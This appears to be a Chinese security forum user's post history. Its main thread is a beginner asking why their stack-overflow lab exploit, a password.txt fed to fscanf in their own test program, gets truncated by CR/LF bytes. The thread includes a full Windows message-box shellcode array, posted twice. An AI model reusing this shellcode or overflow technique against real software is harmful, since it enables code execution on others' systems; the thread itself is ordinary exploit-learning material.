|
[求助]关于动态定位API,书中讲的不太明白?
这段代码,我记得应该是Oday里面的见到过的。。。我觉得书上就已经很清楚了。。。 |
|
[原创]QQ号申请工具 编写原理
顶个.................... |
|
初学漏洞,遇到的小问题
算了。。。编码,看看行不行。。结贴 |
|
初学漏洞,遇到的小问题
[QUOTE][/你只复制了9个字节是因为你的password里面有'\0',而这个'\0'会被当做字符串结束,所以0后面的字符都忽略掉了 QUOTE] 。。。我发现'\0'被复制进去了(被复制进去的是\xFC\x81\xEC\xB8\x01\x00\x00\x68\x6A)。。。一遇到0x0a就会系统自动在0X0A前添加0x0d,这就是为什么会这样的原因了。。但不知道解决方法。。 |
|
初学漏洞,遇到的小问题
谢谢楼上的回复。。但是这样替换掉。。再打开的时候会不会又自动添加呢? |
|
初学漏洞,遇到的小问题
又找到一点头绪了。。。但不知道怎么解决,望大大帮忙。。 有3个数据是0x0A,(假使是PUSH 1E380A6A,也就是x68x6ax0ax38x1e)。。在我写完保存后,重新打开文件这几个0x0A前会自动被系统加上了0x0d,上网查过是因为0x0d是回车,0x0a是换行。。所以他们总是在一起。。..............请问如何令到0x0d不会自动出现在0x0a前呢? |
|
初学漏洞,遇到的小问题
刚才找到了一个问题了。。那个password.txt放的内容是char shellcode[] = "\xFC\x81\xEC\xB8\x01\x00\x00\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B" "\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A" "\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03" "\xF5\x99\x0F\xBE\x06\x3A\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B" "\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB\x53\x68\x6C\x69\x79\x6F\x68\x61\x73\x64" "\x66\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE9\x25\xFF\xFF\xFF"; 我用十六进制编辑工具打开它。。发现所了3个字节,全是0x0d,第一个就是放在我刚才所说的那个地方,0xa0我觉得很奇怪,因为自己也算过,程序上面的shellcode也数过是217个字节,我再把那程序拉到窗口里。。这次正常了,之后无论拉多少次都正常了,就是第一次不正常。。。 请问大牛这是神马原因呢? |
|
|
|
初学漏洞,遇到的小问题
有啊。。 char shellcode[] = "\xFC\x81\xEC\xB8\x01\x00\x00\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B" "\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A" "\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03" "\xF5\x99\x0F\xBE\x06\x3A\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B" "\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB\x53\x68\x6C\x69\x79\x6F\x68\x61\x73\x64" "\x66\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE9\x25\xFF\xFF\xFF"; 但是。。我在OD中看到。。前面的那两个00都被复制进去了。。。0x0A和0x0A之后的内容复制不进去。。 感谢你的回答。。。 |
|
初学漏洞,遇到的小问题
没人回。。。自己顶一个。。 |
|
初学漏洞,遇到的小问题
程序这样。。可能很烦,我简单讲下我想做些什么吧。。 目的:利用栈溢出控制一个程序输出一个窗口 主程序:打开一个跟主程序在同一个目录下的名叫password.txt,读取里面的内容放在一个password的缓冲区中,然后用这个password里的字符与正确的密码1234567作比较,然后输出结果。 (由于这个程序存在栈溢出漏洞,也就是把返回地址改掉,另程序跳到我的代码的地方,那么我就可以控制它,password.txt里就已经把我写的代码和返回地址前EBP等相关的参数都变好了,就等fscanf(fp,"%s",password);)把我的东西复制进去,但是它只是复制了9个字节。。我就晕倒了。。 |
|
[原创]PESpin 1.33全保护脱壳笔记
顶个。。。。。顺便MARK下。。。。。 |
|
[调查]看雪安全网站与北京邮电大学合办信息安全研究生班调查
课程很吸引人,能不能只学那些课程,不要证书呢?当然学费降到一万左右就好了。。 |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值